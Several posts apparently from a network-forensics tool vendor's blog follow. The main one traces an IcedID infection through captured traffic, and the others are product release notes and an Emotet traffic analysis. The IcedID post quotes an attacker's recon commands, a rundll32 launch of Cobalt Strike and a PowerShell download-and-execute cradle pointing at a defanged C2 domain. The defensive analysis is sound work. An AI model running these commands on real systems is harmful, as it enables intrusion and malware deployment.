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Forensic Timeline of an IcedID Infection

The BackConnect and VNC parsers that were added to NetworkMiner 2.8.1 provide a unique possibility to trace the steps of an attacker with help of captured network traffic from a hacked computer.

In this blog post I use the free and open source version of NetworkMiner to see how GzipLoader downloads IcedID, after which the attacker deploys BackConnect VNC to purchase an iPhone 14 with a stolen credit card and then drops Cobalt Strike on the victim PC.

The analyzed pcap is 2022-10-31-IcedID-with-DarkVNC-and-Cobalt-Strike-full-pcap-raw.pcap from Brad Duncan's blog.

Safety First

I ran NetworkMiner in a Windows Sandbox when analyzing this PCAP file to avoid accidentally infecting my computer with any of the malicious artifacts that NetworkMiner extracts from the network traffic.

Another safe way to analyze Windows malware is to run NetworkMiner in Linux or macOS.

14:47 GzipLoader

This infection starts with GzipLoader (aka “IcedID Downloader”) reaching out to its C2 server on vgiragdoffy[.]com ( to download IcedID.

Cookie parameters from GzipLoader request in NetworkMiner 2.8.1
Image: Cookie parameters from GzipLoader request

The “_gat” cookie value in frame number 6 tells us that the victim machine is running a Windows 10 build 19045 (aka 22H2). The long “_u” value contains the victim’s username and hostname in hexadecimal representation and the “__io” value is the logged in user’s SID. NetworkMiner decodes these values from the GzipLoader request and displays them in the Hosts tab.

Hostname, SID, username and Windows version extracted from GzipLoader cookie by NetworkMiner 2.8.1
Image: Hostname, SID, username and Windows version extracted from GzipLoader cookie

For more info about the GzipLoader cookie, see IcedID PhotoLoader evolution by Jason Reaves and the eSentire blog post on Gootloader and IcedID.

The response for this GzipLoader request is a 550 kB file (MD5 700c602086590b05dde8df57933c7e68) with a fake gzip header. This file actually contains the IcedID DLL (Odwikp.dll) and license.dat files.

Fake gzip file containing IcedID
Image: Fake gzip file containing IcedID

14:47 IcedID

The banking trojan IcedID (aka BokBot) gets launched at 14:47:29 UTC (frame 641) after which it connects to these four IcedID servers used for payload delivery and C2:

  • ringashopsu[.]com =
  • sainforgromset[.]com =
  • yeloypod[.]hair =
  • airsaintol[.]beauty =

NetworkMiner hosts details for IcedID C2 server showing JA3S hash ec74a5c51106f0419184d0dd08fb05bc
Image: JA3S hash of C2 server

These four IcedID servers all run TLS servers with self signed certificates issued for "localhost" and doing TLS handshakes with JA3S hash ec74a5c51106f0419184d0dd08fb05bc. Both these properties can be used as filters in NetworkMiner's Hosts tab to only display the IcedID C2 servers.

Self-signed X.509 certificate issued to localhost from ringashopsu[.]com with thumbprint d14983ecbe0f97023721d0960f5dc98388809cc9
Image: Self-signed certificate from ringashopsu[.]com

14:59 BackConnect and Keyhole VNC

Shortly after the IcedID C2 traffic has been started the IcedID bot also initiates BackConnect C2 connections to on TCP port 8080 (frame 4505 at 14:59:14 UTC).

IcedID BackConnect communication in NetworkMiner 2.8.1
Image: IcedID BackConnect communication

The BackConnect C2 server tells the bot to sleep for 60 seconds two times before launching a reverse VNC session with command 0x11 (frame 4530 at 15:01.09 UTC).

VNC desktop screenshots extracted by NetworkMiner
Image: BackConnect VNC screenshots
Screenshot of attacker’s view of victim screen (Keyhole VNC)
Image: Screenshot of attacker’s view of victim screen (Keyhole VNC)

15:06 Apple Store

Attacker’s keystrokes extracted from BackConnect VNC traffic
Image: Attacker’s keystrokes extracted from BackConnect VNC traffic

The keylog of the attacker above reveals that the attacker is typing “iphone 14 apple store buy”. The VNC graphics that NetworkMiner extracted from the PCAP file additionally reveal that this was a Google search query typed into an Edge browser.

Google search results from reverse VNC session
Image: Google search results from reverse VNC session

15:10 Credit Card payment

The attacker proceeds to the Apple Store, puts a black iPhone 14 Plus for $987.99 into the shopping cart, enters a delivery address in West Hartford (US) and then inputs credit card details for the payment.

Credit card details entered in Apple Store by attacker
Image: Credit card details entered in Apple Store by attacker

Luckily, the transaction was denied by Apple Store.

Error message from Apple Store: Your payment authorization failed
Image: Payment authorization failed

15:12 Reverse Shell

After having failed to buy an iPhone through the hacked computer the attacker instead deploys three reverse shell sessions using the BackConnect C2 channel.

Frame 143574 on 15:12:30, Frame 144299 on 15:38:22, Frame 147667 on 15:49:32

These three commands are issued in the first reverse shell session:

net group "domain admins" /dom
arp -a
dir \\\c$

In the second shell session the attacker first runs these three commands:

shell net group "domain admins" /dom
net group "domain admins" /dom
nltest /domain_trusts /all_trusts

...and then starts a file manager session through the BackConnect C2 channel.

15:40 Deploy Cobalt Strike

The BackConnect file manager is used to upload a Cobalt Strike binary called P2.dll to "C:\ProgramData\" on the victim computer in frame 144535.

NetworkMiner 2.8.1 showing CobaltStrike delivered to victim through BackConnect's File Manager
Image: CobaltStrike delivered to victim through BackConnect's File Manager

The uploaded P2.dll is then executed by running this command in the reverse shell session (frame 144707):

rundll32 c:\programdata\P2.dll,DllRegisterServer

NetworkMiner extracts this uploaded DLL from the BackConnect network traffic.

Files extracted by NetworkMiner from network traffic, including Cobalt Strike P2.dll
Image: Files extracted from network traffic Details for Cobalt Strike P2.dll with MD5 hash cc69a31a067b62dda5f2076f8ee335e1
Image: Details for Cobalt Strike P2.dll

VirusTotal results 46 of 71 for P2.dll cc69a31a067b62dda5f2076f8ee335e1 As you can see in the screenshot above, the MD5 hash of P2.dll is cc69a31a067b62dda5f2076f8ee335e1. This file is flagged as malicious by most AV vendors (P2.dll on VT). However, none of them label it as Cobalt Strike. Luckily I was able to use Triage's malware config extractor to verify that this was indeed Cobalt Strike (P2.dll on Triage also revealed that the CobaltStrike C2 URL was

After the DLL gets executed the victim PC establishes Cobalt Strike beacon C2 connections to clouditsoft[.]com on port 8008 (frame 144715).

Cobalt Strike beacon sessions
Image: Cobalt Strike beacon sessions


The BackConnect Reverse Shell log in NetworkMiner's Parameters tab shows that the attacker also attempted to download Cobalt Strike using PowerShell at 15:41:59 UTC (frame 145176) with this command:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://clouditsoft[.]com:8008/lass'))"

IOC List

  • IP:port (GzipLoader)
  • DNS vgiragdoffy[.]com (GzipLoader)
  • MD5 700c602086590b05dde8df57933c7e68 (Fake gzip file)
  • MD5 f57ab2e5e5720572d5eb19010ec8dcb4 (IcedID Odwikp.dll from fake gzip)
  • MD5 57a9d9acb389bd74a7423a16ef81ac18 (IcedID license.dat from fake gzip)
  • DNS ringashopsu[.]com (IcedID C2)
  • DNS sainforgromset[.]com (IcedID C2)
  • DNS yeloypod[.]hair (IcedID C2)
  • DNS airsaintol[.]beauty (IcedID C2)
  • IP:port (IcedID C2)
  • IP:port C2)
  • IP:port (IcedID C2)
  • IP:port (IcedID C2)
  • JA3S hash ec74a5c51106f0419184d0dd08fb05bc (IcedID C2)
  • IP:port (IcedID BackConnect C2)
  • MD5 cc69a31a067b62dda5f2076f8ee335e1 (CobaltStrike P2.dll)
  • DNS clouditsoft[.]com (CobaltStrike C2)
  • IP:port (CobaltStrike C2)

Posted by Erik Hjelmvik on Thursday, 12 October 2023 13:23:00 (UTC/GMT)

Tags: #NetworkMiner#IcedID#GzipLoader#BackConnect#VNC#CobaltStrike#Cobalt Strike#Windows Sandbox#ec74a5c51106f0419184d0dd08fb05bc#JA3S

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CapLoader 1.9.4 Released

CapLoader 1.9.4

A new version of our advanced PCAP filtering tool CapLoader was released today. The new CapLoader 1.9.4 release includes features like JA3 hash extraction from TLS traffic and a fantastic thing called Select Similar Flows, which is a unique feature that you will only find in CapLoader! We have also included a VXLAN parser, so that flows tunneled inside of overlay networks can be presented directly in the CapLoader GUI.

Select Similar Flows or Services

If you right-click a flow or service in CapLoader you’ll now be presented with an option to “select similar flows” (or services). This feature causes CapLoader to read through the loaded PCAP files again in order to find other flows that are similar to the one that was right-clicked. CapLoader doesn’t care about IP addresses or port numbers when assessing this similarity. Instead it looks at behavioral patterns in the traffic itself, such as packet sizes and byte patterns. In practice, this feature will select flows that are communicating using the same protocol as the one you clicked, regardless of which port it runs on. CapLoader already comes with an advanced feature for doing port-independent protocol identification, which currently detects over 170 protocols. But the “select similar” feature can even be used to find odd or proprietary protocols that aren’t in CapLoaders protocol database.

There is also a feature called “select VERY similar flows” which, instead of searching for flows with the same protocol, looks for flows with the same implementation or dialect of that particular protocol. This feature can be used to single out the network traffic of a particular software or tool from a haystack of network traffic from multiple applications, which all run the same application layer protocol. Another use case is to find additional malicious C2 sessions that run on top of a standard protocol like HTTP, TLS or DNS – provided that you’ve located at least one such malicious flow or service.

JA3 and JA3S Hashes for TLS Flows

We added JA3 extraction to NetworkMiner back in 2019, with the release of NetworkMiner 2.5. It’s now time to bring this useful little TLS fingerprinting feature into CapLoader as well. As of version 1.9.4 CapLoader attempts to extract JA3 and JA3S hashes from all TCP flows. The JA3 and JA3S hashes are presented in the Flows and Services tabs as separate columns. This allows users to filter flows based on a JA3 hash directly in CapLoader instead of having to export a filtered PCAP to an external tool to calculate JA3 hashes.

CapLoader with Column Critera filter for JA3 hash

Image: Column criteria filter “JA3 = a72f351cf3c3cd1edb345f7dc071d813” on PCAP from CERT-SE’s 2021 CTF.

Extraction of Flows Inside of VXLAN Tunnels

VXLAN is a network virtualization technology that can be used to create overlay networks, where Ethernet frames are encapsulated inside of UDP packets (see RFC 7348). The UDP port used for VXLAN is 4789 or 8472. We added support for VXLAN to NetworkMiner in 2017, but CapLoader has until now only presented the VXLAN tunnels in the GUI when VXLAN traffic is loaded. We’re happy to announce that CapLoader now extracts flows for the VXLAN tunnels and the traffic inside of those tunnels.

ICMP flow extracted from VXLAN tunnel

Image: ICMP flow extracted from VXLAN tunnel. PCAP file is Virtual_Extensible_LAN-VXLAN.pcap from Xena Networks

Additional GUI Improvements

We’ve also made several minor improvements to CapLoader’s user interface, such as a “Save Visible Flows” option on the File menu, which can be used to save the filtered traffic in the current view to a PCAP file. Another nice addition is the “Copy from Selected Rows” menu option, which can be used to copy text from a particular column.

CapLoader’s OSINT lookup context menus have also been updated to include some very useful services like Feodo Tracker, Hatching Triage and IPVoid.

Free Trial versus Full Version

Many of the new additions to CapLoader are only available in the full version, but the VXLAN extraction and some of the GUI additions are also available in the free trial version of CapLoader. No registration is required to download the trial — just download, extract and run for 30 days. If you like it, then please consider purchasing the full version!

Updating to the Latest Release

Users who have already purchased a license for CapLoader can download a free update to version 1.9.4 from our customer portal.

Posted by Erik Hjelmvik on Thursday, 16 June 2022 11:44:00 (UTC/GMT)

Tags: #CapLoader#JA3#JA3S#Protocol Identification#Protocol Detection#PCAP#TLS#VXLAN

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Emotet C2 and Spam Traffic Video

This video covers a life cycle of an Emotet infection, including initial infection, command-and-control traffic, and spambot activity sending emails with malicious spreadsheet attachments to infect new victims.

The video was recorded in a Windows Sandbox in order to avoid accidentally infecting my Windows PC with malware.

Initial Infection

Palo Alto's Unit 42 sent out a tweet with screenshots and IOCs from an Emotet infection in early March. A follow-up tweet by Brad Duncan linked to a PCAP file containing network traffic from the infection on

Screenshot of original infection email from Unit 42

Image: Screenshot of original infection email from Unit 42

  • Attachment MD5: 825e8ea8a9936eb9459344b941df741a

Emotet Download

The PCAP from shows that the Excel spreadsheet attachment caused the download of a DLL file classified as Emotet.

CapLoader download of Emotet DLL from

Image: CapLoader transcript of Emotet download

  • DNS:
  • MD5: 99f59e6f3fa993ba594a3d7077cc884d

Emotet Command-and-Control

Just seconds after the Emotet DLL download completes the victim machine starts communicating with an IP address classified as a botnet command-and-control server.

Emotet C2 sessions with JA3 51c64c77e60f3980eea90869b68c58a8 in CapLoader

Image: Emotet C2 sessions in CapLoader

  • C2 IP:
  • C2 IP:
  • C2 IP:
  • JA3: 51c64c77e60f3980eea90869b68c58a8
  • JA3S: ec74a5c51106f0419184d0dd08fb05bc
  • JA3S: fd4bc6cea4877646ccd62f0792ec0b62

Emotet Spambot

The victim PC eventually started sending out spam emails. The spam bot used TLS encryption when possible, either through SMTPS (implicit TLS) or with help of STARTTLS (explicit TLS).

Emotet spambot JA3 hash 37cdab6ff1bd1c195bacb776c5213bf2 in NetworkMiner Professional

Image: Emotet spambot JA3 hash in NetworkMiner Professional

  • SMTPS JA3: 37cdab6ff1bd1c195bacb776c5213bf2
  • STARTTLS JA3: 37cdab6ff1bd1c195bacb776c5213bf2

Transmitted Spam

Below is a spam email sent from the victim PC without TLS encryption. The attached zip file contains a malicious Excel spreadsheet, which is designed to infect new victims with Emotet.

Emotet spam email from PCAP

Image: Spam email extracted from Emotet PCAP with NetworkMiner

  • .zip Attachment MD5: 5df1c719f5458035f6be2a071ea831db
  • .xlsm Attachment MD5: 79cb3df6c0b7ed6431db76f990c68b5b

Network Forensics Training

If you want to learn additional techniques for analyzing network traffic, then take a look at our upcoming network forensic trainings.

Posted by Erik Hjelmvik on Monday, 09 May 2022 06:50:00 (UTC/GMT)

Tags: #Emotet#C2#video#pcap#JA3#JA3S#51c64c77e60f3980eea90869b68c58a8#ec74a5c51106f0419184d0dd08fb05bc#fd4bc6cea4877646ccd62f0792ec0b62#SMTP#SMTPS#Windows Sandbox

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NetworkMiner 2.7 Released

NetworkMiner 2.7 Logo

We are happy to announce the release of NetworkMiner 2.7 today! The new version extracts documents from print traffic and pulls out even more files and parameters from HTTP as well as SMB2 traffic. We have also updated our JA3 implementation to fingerprint the server side in TLS sessions using JA3S hashes and added a few tweaks to the user interface to better identify the extension of extracted files.

Extraction of Printed Data

NetworkMiner 2.7 can extract documents from LPR/LPD print traffic on TCP 515 (RFC1179). The extracted print data is saved to disk as .prn files, which can be analyzed with tools like PCL Paraphernalia. The professional version of NetworkMiner also comes with a carver that attempts to extract PostScript and PDF files from print traffic.

Improved File Extraction from PCAP

One of the premier features of NetworkMiner is its ability to extract transferred files from network traffic. We have fine tuned NetworkMiner’s file extraction code for SMB2 as well as HTTP POST in this release, in order to retrieve as much information as possible from these protocols. We’ve also added more granular logging of SMB2 requests and responses to the Parameters tab.

More DNS Types Supported

NetworkMiner 2.7 now parses DNS TXT and SRV resource records, which are displayed in NetworkMiner’s DNS tab. The TXT records can be used for almost anything, but the SRV records are used to map service types to the hostnames that provide that service. SRV lookups are often used in order to locate the domain controller on a network by querying for “_ldap._tcp.dc._msdcs.<DOMAIN>”.

DNS SRV and TXT records in NetworkMiner

DNS SRV of lookups are performed by malware and attackers as well as for legitimate reasons, even though attackers sometimes make mistakes that can be used for detection or threat hunting.

TLS Server Fingerprinting with JA3S

We introduced TLS client fingerprinting using JA3 hashes in NetworkMiner 2.5. We have now also added support for JA3S hashes, which is a method for fingerprinting the server side of a TLS connection. The JA3S hashes are extracted from the “Server Hello” TLS packets and shown on NetworkMiner’s Parameters tab as well as in the Host Details of the server. We have also improved how NetworkMiner displays the JA3 hashes in the Host Details view.

JA3S hashes in NetworkMiner

Additional User Interface Improvements

Double clicking on an extracted file in NetworkMiner's Files tab now brings up the File Details window. We’ve extended this window to also include a simple hex viewer and a feature that attempts to identify the file type based on the reassembled file’s header.

NetworkMiner's File Details window with hex viewer

The file type identification feature is also used in order to provide more accurate file extensions to extracted files, such as “.exe” or “.zip”, instead of the “.octet-stream” that you’d often see in previous versions of NetworkMiner. We have added a warning dialogue to NetworkMiner 2.7 that shows up if a user tries to run an executable file directly from the NetworkMiner GUI.

Warning dialogue in NetworkMiner when opening executable file

NetworkMiner Professional

Our commercial tool NetworkMiner Professional has received a few additional updates. It can, for example, carve PDF and PostScript files from extracted LPR print data. We have also added several OSINT services, such as ANY.RUN, MalwareBazaar, URLHaus and ThreatFox, for performing lookups of file hashes. The OSINT context menu is opened by right-clicking an extracted file in NetworkMiner Professional.

GPS data stored in pcap-ng option fields, typically by Kismet, is now extracted as capture file metadata. Right-click a capture file and select "Show Metadata" to show the coordinates from Kismet. We have also re-implemented the support for a PCAP-over-IP listener in NetworkMinerCLI, which is the command line version of NetworkMiner Pro. This feature allows the command line tool to receive PCAP data over a TCP socket instead of reading from a capture file. The PCAP-over-IP listener feature was previously broken in NetworkMinerCLI.


We’d like to thank Hayo Brouwer (of Ricoh) for requesting the LPR extraction feature and providing capture files for testing, Jeff Rivett for reporting a 64 bit issue with WinPcap/Npcap and Ali Mohd for reporting the broken PCAP-over-IP listener feature.

Upgrading to Version 2.7

Users who have purchased NetworkMiner Professional can download a free update to version 2.7 from our customer portal, or use the “Help > Check for Updates” feature. Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Posted by Erik Hjelmvik on Tuesday, 15 June 2021 11:55:00 (UTC/GMT)

Tags: #NetworkMiner#PCAP#SMB2#JA3#JA3S#ANY.RUN#ThreatFox#OSINT

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